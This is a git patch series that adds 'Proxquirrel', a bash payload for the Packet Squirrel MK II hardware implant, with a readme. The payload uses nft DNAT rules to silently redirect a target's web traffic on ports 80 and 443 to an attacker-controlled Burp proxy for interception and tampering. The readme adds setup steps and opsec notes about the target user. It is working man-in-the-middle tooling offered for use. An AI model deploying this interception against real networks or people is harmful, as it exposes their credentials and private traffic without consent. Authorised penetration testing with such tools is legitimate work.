From def28f9150b976819d4c9a9c932eeab74dffa3e6 Mon Sep 17 00:00:00 2001 From: 0i41E <79219148+0i41E@users.noreply.github.com> Date: Sat, 3 Aug 2024 21:39:45 +0200 Subject: [PATCH 1/2] Added Proxquirrel --- payloads/interception/Proxquirrel/payload | 59 +++++++++++++++++++++ payloads/interception/Proxquirrel/readme.md | 36 +++++++++++++ 2 files changed, 95 insertions(+) create mode 100644 payloads/interception/Proxquirrel/payload create mode 100644 payloads/interception/Proxquirrel/readme.md diff --git a/payloads/interception/Proxquirrel/payload b/payloads/interception/Proxquirrel/payload new file mode 100644 index 0000000..a4160b9 --- /dev/null +++ b/payloads/interception/Proxquirrel/payload @@ -0,0 +1,59 @@ +#!/bin/bash + +# Title: Proxquirrel +# Author: 0i41E +# +# Description: A payload to route web traffic to a defined Proxy, like BurpSuite. +# +# Usage: Setup a HTTP proxy like Burp, accessible for the Squirrel and define it under line 17 & 18 + +# Set Network mode +NETMODE NAT +SSH_STOP +UI_STOP + +LED STAGE3 +sleep 2 + +# Define HTTP proxy below +PROXY_ADDRESS="0.0.0.0" # Proxy Address +PROXY_PORT="8080" # Proxy Port +# Optional to change +TARGET_PORTS="80, 443" # Intercepted Web Ports +RULE_NAME="Proxquirrel" +RETRY=5 # Seconds between connection attempts + +# Enable IPv4 forwarding +echo 1 > /proc/sys/net/ipv4/ip_forward + +# Loop until the proxy is reachable +while true; do + if nc -z -w5 "$PROXY_ADDRESS" "$PROXY_PORT"; then + LED Y SOLID + sleep 2 + + # Create a nft ruleset to redirect traffic from ports defined in TARGET_PORTS + nft add table ip $RULE_NAME + nft -- add chain ip $RULE_NAME prerouting { type nat hook prerouting priority -100 \; } + nft add rule ip $RULE_NAME prerouting tcp dport { $TARGET_PORTS } dnat to $PROXY_ADDRESS:$PROXY_PORT + + LED FINISH + sleep 3 + + # Cleanup, when BUTTON is pressed + NO_LED=1 BUTTON + + LED CLEANUP + sleep 3 + + # Delete the table when BUTTON is pressed, to revert changes + nft delete table ip $RULE_NAME + + LED B SOLID + break + else + # Retry in X seconds + LED FAIL2 + sleep $RETRY + fi +done diff --git a/payloads/interception/Proxquirrel/readme.md b/payloads/interception/Proxquirrel/readme.md new file mode 100644 index 0000000..54ad112 --- /dev/null +++ b/payloads/interception/Proxquirrel/readme.md @@ -0,0 +1,36 @@ +# Proxquirrel +#### Author: + +**Proxquirrel** is a payload designed for the [Package Squirrel MK II](https://shop.hak5.org/products/packet-squirrel-mark-ii) in combination with a HTTP proxy, like [BurpSuite](https://portswigger.net/burp/releases/professional-community-2024-5-5?requestededition=community&requestedplatform=). + +This payload will redirect common web ports like 80 and 443 and therefore enables the user to intercept such traffic with an external proxy and tinker with its content. + +## Preperation +#### Squirrel +Before deploying the Squirrel as also the payload, the user has to configure the payload. +Set `PROXY_ADDRESS` and `PROXY_PORT`. This has to be the proxy (server). +The other options are optional and can be changed, if needed. +#### BurpSuite +Start up BurpSuite and navigate to the *Proxy* tab and open up the options. +BILD +Here you have to edit the *proxy listener*. +Set the *bind address* to either the interface accessible by the Squirrel or simply select *All Interfaces*. +BILD +*The payload will automatically verify the connection. If the proxy can't be reached, the payload will fall into a loop, until the proxy (server) is accessible.* + +For the last step, we have to check *Support invisible proxying* under the *Request handling* tab. +In this mode, BurpSuite intercepts traffic that is not specifically directed at a proxy. It acts as an intermediary without requiring the client to be configured for a proxy. This is useful for intercepting traffic from devices or applications that do not allow for proxy configuration. (Or in this case, do not know about it) + +Traffic to ports 80 & 443 should now be redirected to your proxy. + +#### Cleanup +To revert the changes on the Squirrel, press the button to perform a cleanup. + + + +### Opsec Considerations +Since this payload performs some sort of interception of the targets traffic, the target-user may encounter multiple issues: + - Security warnings about the connection to a web page not being secure. + - Not being able to use certain web applications due to HSTS. + - Sensitive information may be visible within the intercepted requests and should be handled with care. + - The user may be blocked by certain WAF's \ No newline at end of file From ff400cb05f5d38018c2cb4db1edca5ba08d18bd6 Mon Sep 17 00:00:00 2001 From: 0i41E <79219148+0i41E@users.noreply.github.com> Date: Sat, 3 Aug 2024 21:45:56 +0200 Subject: [PATCH 2/2] Update readme.md --- payloads/interception/Proxquirrel/readme.md | 25 +++++++++++++-------- 1 file changed, 16 insertions(+), 9 deletions(-) diff --git a/payloads/interception/Proxquirrel/readme.md b/payloads/interception/Proxquirrel/readme.md index 54ad112..ae74241 100644 --- a/payloads/interception/Proxquirrel/readme.md +++ b/payloads/interception/Proxquirrel/readme.md @@ -1,7 +1,7 @@ # Proxquirrel #### Author: -**Proxquirrel** is a payload designed for the [Package Squirrel MK II](https://shop.hak5.org/products/packet-squirrel-mark-ii) in combination with a HTTP proxy, like [BurpSuite](https://portswigger.net/burp/releases/professional-community-2024-5-5?requestededition=community&requestedplatform=). +**Proxquirrel** is a payload designed for the [Packet Squirrel MK II](https://shop.hak5.org/products/packet-squirrel-mark-ii) in combination with a HTTP proxy, like [BurpSuite](https://portswigger.net/burp/releases/professional-community-2024-5-5?requestededition=community&requestedplatform=). This payload will redirect common web ports like 80 and 443 and therefore enables the user to intercept such traffic with an external proxy and tinker with its content. @@ -11,14 +11,21 @@ Before deploying the Squirrel as also the payload, the user has to configure the Set `PROXY_ADDRESS` and `PROXY_PORT`. This has to be the proxy (server). The other options are optional and can be changed, if needed. #### BurpSuite -Start up BurpSuite and navigate to the *Proxy* tab and open up the options. -BILD +Start up BurpSuite and navigate to the *Proxy* tab and open up the *Proxy Settings*. Here you have to edit the *proxy listener*. -Set the *bind address* to either the interface accessible by the Squirrel or simply select *All Interfaces*. -BILD + +![1](https://github.com/user-attachments/assets/875a0ce2-7378-4dc4-8027-d1b2ea7c48a8) + +Set the *bind address* to either an interface accessible by the Squirrel or simply select *All Interfaces*. + +![2](https://github.com/user-attachments/assets/af79f9e7-8d2c-4bc0-8e93-57b477ab4299) + *The payload will automatically verify the connection. If the proxy can't be reached, the payload will fall into a loop, until the proxy (server) is accessible.* For the last step, we have to check *Support invisible proxying* under the *Request handling* tab. + +![3](https://github.com/user-attachments/assets/3ae5bbbd-0695-46cd-a076-2a4d30d6feb0) + In this mode, BurpSuite intercepts traffic that is not specifically directed at a proxy. It acts as an intermediary without requiring the client to be configured for a proxy. This is useful for intercepting traffic from devices or applications that do not allow for proxy configuration. (Or in this case, do not know about it) Traffic to ports 80 & 443 should now be redirected to your proxy. @@ -30,7 +37,7 @@ To revert the changes on the Squirrel, press the button to perform a cleanup. ### Opsec Considerations Since this payload performs some sort of interception of the targets traffic, the target-user may encounter multiple issues: - - Security warnings about the connection to a web page not being secure. - - Not being able to use certain web applications due to HSTS. - - Sensitive information may be visible within the intercepted requests and should be handled with care. - - The user may be blocked by certain WAF's \ No newline at end of file +- Security warnings about the connection to a web page not being secure. +- Not being able to use certain web applications due to HSTS. +- Sensitive information may be visible within the intercepted requests and should be handled with care. +- The user may be blocked by certain WAF's